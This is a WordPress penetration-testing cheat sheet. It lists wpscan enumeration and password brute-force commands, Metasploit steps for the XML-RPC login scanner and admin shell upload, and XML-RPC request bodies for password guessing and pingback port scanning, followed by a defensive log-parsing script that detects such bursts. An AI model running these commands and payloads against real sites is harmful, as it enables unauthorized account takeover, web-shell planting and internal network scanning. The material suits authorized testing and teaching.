๐Ÿดwordpress pentesting

WordPress Pentesting

Enumeration

Wpscan

# Help menu
wpscan -h

# Non-intrusive scan
wpscan --url <target-url>

# Plugin enumeration
wpscan --url www.example.com --enumerate p

# User enumeration
wpscan --url www.example.com --enumerate u

Brute Force Attack

# Brute-force the users found, using 50 threads
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50

# Brute-force a single user
wpscan --url www.example.com --wordlist darkc0de.lst --username admin

# Password attack through XML-RPC
wpscan --password-attack xmlrpc -U admin -P <password-wordlist> --url <target-url>

Metasploit

xmlrpc

# Start Metasploit
msfconsole

# Search wordpress modules
search type:auxiliary wordpress

# Use xmlrpc module
use auxiliary/scanner/http/wordpress_xmlrpc_login

# Show options
show options

# Run
run

Shell Upload

# Start Metasploit
msfconsole

# Search for shell_upload module
search shell_upload

# Use module
use exploit/unix/webapp/wp_admin_shell_upload

# Show the available options
show options

# Run
run

XML-RPC Attack

xmlrpc.php

http://<targetWebSite.com>/<wordpress directory>/xmlrpc.php

Send the following body in a POST request to list all available methods:

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Brute-force login via wp.getUsersBlogs (one username/password pair per call)

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

XSPA (cross-site port attack) or simply port scanning

pingback.ping

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<YOUR SERVER>:<port></string></value></param>
<param><value><string>http://<SOME VALID BLOG FROM THE SITE></string></value></param>
</params>
</methodCall>
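Detection from the defender's side, as an added example that is not part of the original notes: a Python script that parses web-server access-log lines (Apache/nginx combined format) and flags sources that POST to xmlrpc.php or wp-login.php in bursts, which is how the wp.getUsersBlogs password guessing and pingback.ping scanning above show up in logs. The log lines, IPs and thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format; only the fields needed for detection are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints abused by the techniques on this page. Note that a failed
# wp.getUsersBlogs guess still returns HTTP 200 (an XML-RPC fault), so the
# status code alone cannot separate good logins from guessing; rate can.
WATCHED = ("/xmlrpc.php", "/wp-login.php")

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]   # drop query string
    return rec

def detect_bursts(lines, threshold=10, window_s=60):
    """Return {(ip, path): total_posts} for every source that sends more than
    `threshold` POSTs to a watched endpoint inside any `window_s` second window.
    endswith() keeps the check working when WordPress lives in a subdirectory."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith(WATCHED):
            events[(rec["ip"], rec["path"])].append(rec["ts"])
    alerts = {}
    for key, stamps in events.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):          # sliding window over timestamps
            while (t - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > threshold:
                alerts[key] = len(stamps)
                break
    return alerts

# Constructed sample: one source hammering xmlrpc.php (15 POSTs in 30 s), one normal visitor.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{sec:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"'
    for sec in range(0, 30, 2)
] + [
    '198.51.100.2 - - [10/Oct/2023:13:55:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Oct/2023:13:55:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (ip, path), count in detect_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip} -> {path}: {count} POSTs")
```

Feed it a real access log with `detect_bursts(open("access.log"))` and tune `threshold` to the site's legitimate XML-RPC traffic (Jetpack and mobile apps use xmlrpc.php too) before alerting on it.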
